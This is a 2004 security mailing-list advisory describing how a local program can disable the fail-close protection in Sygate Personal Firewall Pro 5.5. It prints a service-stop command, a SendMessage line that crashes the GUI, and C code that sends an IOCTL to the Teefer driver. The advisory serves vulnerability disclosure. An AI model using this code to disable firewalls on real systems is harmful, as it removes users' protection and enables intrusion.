Date: 14 Jun 2004 14:05:51 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [NT] Sygate Personal Firewall Pro May Be Disabled By Local Programs
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Sygate Personal Firewall Pro May Be Disabled By Local Programs
------------------------------------------------------------------------
SUMMARY
<http://soho.sygate.com/products/spf_pro.htm>; Sygate Personal Firewall
Pro provides a "multi-layered shield of network, content, application, and
operating system protection for your PC. The Pro version includes a
comprehensive Intrusion Protection System (IPS) which includes IDS, DoS
protection, and Trojan protection."
Sygate Personal Firewall has a fail-safe mechanism that will stop all
network traffic to and from the system in case the firewall service in
unavailable. Hence if a malicious local program is able to kill the
firewall service, all traffic will stop. However, there is a flaw in the
implementation of this feature, allowing an attacker to bypass this
mechanism.
DETAILS
Vulnerable Systems:
* Sygate Personal Firewall Pro version 5.5 Build 2525 on Win2k SP4
Sygate Personal Firewall Pro (SPFP) is implemented as a user-space service
(smc.exe), and as a kernel-space NDIS intermediate driver (teefer.sys).
The driver creates a device named \\device\Teefer. The user-space service
(smc.exe, tfman.dll) communicates with the kernel-space driver through
this device using specific Device I/O control codes.
The driver does not validate the source of the control codes, allowing
malicious programs to send control codes to the driver and disable its
fail-close protection. SPFP attempts to prevent this by allowing only one
program in user-space to open a handle to its driver. Theoretically, as
long as smc.exe is running, no other program can access the driver. This
simple protective measure can be circumvented in two ways:
1. If the program is running with administrative permissions it can simply
stop smc.exe:
net stop smcservice
2. A non-administrative program can exploit the ListView control in SPFP's
GUI in order to crash the service. An example of the line of code needed
to do this is given below:
SendMessage(hHdrControl, HDM_GETITEMRECT, 1, (LPARAM)NON-WRITABLE_ADDR);
The fail-safe mechanism then will disable all incoming and outgoing
traffic by using the following code:
hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("Open failed\n");
}
else
{
printf("Device opened.\n");
char buffer[8];
DWORD *ptr = (DWORD *)buffer;
DWORD *ptr2 = (DWORD *)(buffer + 4);
DWORD ret;
*ptr = 0;
*ptr2 = 0;
if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8,
&ret, 0))
printf("Sent.\n");
CloseHandle(hDevice);
}
Vendor Status:
The vendor has been contacted and the vulnerability will be fixed in the
upcoming release.
Disclosure Timeline
20 May 04 - Vulnerability Discovered
30 May 04 - Initial Vendor Notification
08 Jun 04 - Initial Vendor Response
13 Jun 04 - Public Release
ADDITIONAL INFORMATION
The information has been provided by <mailto:chewkeong@security.org.sg.>
Chew Keong TAN.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
